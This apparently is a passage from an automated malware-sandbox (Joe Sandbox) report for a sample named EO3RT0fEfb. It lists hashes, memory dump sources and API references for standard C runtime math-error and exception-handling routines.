                                                            • Instruction Fuzzy Hash: 4101D873E18BC541EA14DF22A40037AA252BFDBBD4F504334E95E1AB94EF7DD0404B00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                            • String ID: !$cos
                                                            • API String ID: 3384550415-1949035351
                                                            • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                            • Instruction ID: f06287c458bdcaf2e40b1e5de39d63633a28cb5582b74cb2332b0f143a2fcbf7
                                                            • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                            • Instruction Fuzzy Hash: DA01D873E18BC941EA14DF22A40037AA152BFDBBD4F504334E95E1AB94EF7DD0504B00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$exp
                                                            • API String ID: 1757819995-2878093337
                                                            • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                            • Instruction ID: b9904831c76fd88f200fc4cf742d04641c3c2ce4848e017cf65e714b6d224093
                                                            • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                            • Instruction Fuzzy Hash: A101C876929BC883F620DF24E0452EBB7B1FFEA354F641315E74426A60DB7DD4819B00
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF75F1675E9
                                                            • TlsSetValue.KERNEL32(?,?,?,00007FF75F167241,?,?,?,?,00007FF75F16660C,?,?,?,?,00007FF75F164CD3), ref: 00007FF75F167600
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Valuetry_get_function
                                                            • String ID: FlsSetValue
                                                            • API String ID: 738293619-3750699315
                                                            • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                            • Instruction ID: 2536aa138cbb57fa3d1b52d122950ecce4226d94a47960db5635aea79d6ac0da
                                                            • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                            • Instruction Fuzzy Hash: 17E06561A1C5C281FF097B55F8404F4A362AF88B91FCC4431DA0F06655EF3CD485C630
                                                            APIs
                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF75F165629
                                                            • _CxxThrowException.LIBVCRUNTIME ref: 00007FF75F16563A
                                                              • Part of subcall function 00007FF75F167018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F16563F), ref: 00007FF75F16708D
                                                              • Part of subcall function 00007FF75F167018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F16563F), ref: 00007FF75F1670BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                            • String ID: Unknown exception
                                                            • API String ID: 3561508498-410509341
                                                            • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                            • Instruction ID: c45731b6e2820650558dac849fa2a73da0ee98db316e0edad519e61e1de61034
                                                            • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                            • Instruction Fuzzy Hash: 48D05E26A189C691DF10FB04E8953E8E331FB90308FD84432E24D829B5EF2DD64AD720